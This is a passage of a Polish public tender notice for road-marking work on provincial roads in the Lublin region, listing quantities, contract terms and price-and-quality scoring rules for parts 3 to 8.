zamówienia</h3> <p class="mb-0"> Zadanie Nr III – RDW w Hrubieszowie:<br/>Drogi Nr: 844, 846, 850, była dk nr 17, 865, 816, 852, 867<br/>Malowanie cienkowarstwowe linie osiowe :	24 110 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	17 975 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 6 328 m2<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:	30 m2<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych:	280 m2<br/>Ścieranie zbędnego oznakowania:	80 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie III- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr IV – RDW w Lublin z/s w Bychawie:<br/>Drogi Nr: 747, 828, 830, 833, 835, 835a, 842, 874, 809, 809a, 822, 822a, 827, 834, 836, 848<br/>Malowanie cienkowarstwowe linie osiowe :	12 000 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	15 600 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 950 m2<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych: 3 300 m2<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych: 700 m2<br/>Ścieranie zbędnego oznakowania:	320 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie IV- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr V – RDW w Parczewie:<br/>Drogi Nr: 813, 815, 820, 828, 809, 814, 819, 821, 829<br/>Malowanie cienkowarstwowe linie osiowe:	7 952 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	15 573 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 1 502 m2<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:	4 405 m2<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych: 680 m2<br/>Symbole znaków – piktogramy z mas termoplastycznych: 4 m2<br/>Ścieranie zbędnego oznakowania: 50 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie V- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr VI – RDW w Puławach:<br/>Drogi Nr: 801, 824, 830, 874, 738, 743, 747, 755, 759, 826, 831, 832, 854, 855, 857, 839, 848<br/>Malowanie cienkowarstwowe linie osiowe :	15 930 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	16 110 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 3 300 m2<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:	3 560 m2<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych: 5 340 m2<br/><br/>Ścieranie zbędnego oznakowania: 100 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie VI- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr VII – RDW we Włodawie:<br/>Drogi Nr: 812, 816, 819<br/>Malowanie cienkowarstwowe linie osiowe :	15 370,30 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	31 650,06 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 4 834,81 m2<br/>Ścieranie zbędnego oznakowania:	125,00 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie VII- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr VIII – RDW w Zamościu :<br/>Drogi Nr: 835, 858, 837, 843, 849, 853, 863, 877<br/>Malowanie cienkowarstwowe linie osiowe :	13 130 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	19 586 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 1 724 m2<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:	550 m2<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych:	1330 m2<br/>Ścieranie zbędnego oznakowania:	140 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie VIII- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, 